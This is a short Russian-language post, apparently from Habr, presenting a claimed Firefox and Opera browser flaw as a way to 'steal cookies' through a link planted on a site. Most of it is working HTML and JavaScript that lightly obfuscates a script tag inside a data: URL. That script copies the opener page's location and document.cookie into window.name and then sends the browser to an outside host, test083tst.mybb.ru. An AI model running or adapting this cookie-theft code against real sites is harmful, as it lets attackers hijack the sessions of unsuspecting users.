Хабро идея - браузерная уязвимость FF и Opera
Тырим куки вставленной на сайт ссылкой (Посколь в песочнице топика куков обычно нет, выведется только ссылка
<a id="filt_city" target="_blank" href="http://test083tst.mybb.ru/">Клик</a>
<script type="text/javascript">
var a=document.getElementById('filt_city'),c="scr",
b ="data:text/html, <a>window.name=window.opener.location+','\
+window.opener.document.cookie;window.location='http://test083tst.mybb.ru/'</a>".replace(/a(>)/g,c+'ipt$1');a.href=b;
</script>